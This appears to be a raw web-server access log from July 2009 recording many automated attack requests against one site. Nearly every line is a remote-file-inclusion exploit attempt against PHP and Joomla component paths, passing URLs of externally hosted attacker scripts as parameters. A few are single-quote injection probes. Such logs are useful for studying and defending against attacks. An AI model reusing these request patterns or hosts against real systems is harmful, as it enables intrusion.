89.223.3.98 - - [04/Jul/2009:06:23:07 -0700] "GET /logs/access.log/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:23:41 -0700] "GET /logs/access_090521.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:23:41 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:23:41 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:06:23:43 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:06:23:43 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:06:25:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:06:25:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:26:40 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:26:47 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.206.99.238 - - [04/Jul/2009:06:27:16 -0700] "GET /logs/access.log//errors.php?error=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "hellionindustries.com"
195.206.99.238 - - [04/Jul/2009:06:27:17 -0700] "GET /errors.php?error=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "hellionindustries.com"
195.206.99.238 - - [04/Jul/2009:06:27:17 -0700] "GET /logs//errors.php?error=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:30:58 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:30:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:30:58 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:31:59 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:31:59 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:31:59 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:32:25 -0700] "GET /logs/access_090521.log%20%20/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:32:35 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:32:35 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:32:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:32:36 -0700] "GET /logs/access_090521.log%20%20/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:32:42 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:33:43 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:35:37 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:35:37 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
76.12.17.218 - - [04/Jul/2009:06:35:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:36:02 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:36:02 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:36:03 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:36:39 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:37:45 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:37:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:37:45 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:38:18 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:06:38:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:06:38:34 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:06:38:40 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:42:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:42:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.114.132.122 - - [04/Jul/2009:06:42:56 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:06 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:06 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:06 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:14 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:14 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:15 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:20 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:20 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:43:21 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:44:12 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:44:12 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:44:12 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:44:49 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:44:49 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:44:50 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:44:54 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:44:54 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.158.35.151 - - [04/Jul/2009:06:44:54 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:45:02 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:06:45:09 -0700] "GET /logs/access_090521.log/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:06:45:10 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:44 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:44 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:44 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:57 -0700] "GET /include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:58 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:06:45:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:46:04 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:46:04 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.158.98.196 - - [04/Jul/2009:06:46:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:46:51 -0700] "GET /logs/access.log//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:46:51 -0700] "GET /logs//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:46:51 -0700] "GET /error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:01 -0700] "GET /error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:01 -0700] "GET /logs/access.log//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:01 -0700] "GET /logs//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:13 -0700] "GET /logs/access.log//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:13 -0700] "GET /logs//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:13 -0700] "GET /error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:24 -0700] "GET /logs/access.log//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:24 -0700] "GET /logs//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:24 -0700] "GET /error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:54 -0700] "GET /error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:54 -0700] "GET /logs/access.log//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.228.29.70 - - [04/Jul/2009:06:47:54 -0700] "GET /logs//error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:48:14 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:48:14 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:41 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:41 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:41 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:46 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:46 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:48:46 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:06:49:03 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:06:49:19 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:50:04 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:50:04 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:50:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:06:51:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:06:51:57 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:52:13 -0700] "GET /logs/access.log%20%20//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:52:13 -0700] "GET /////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 200 782 "-" "Mozilla/5.0" "hellionindustries.com"
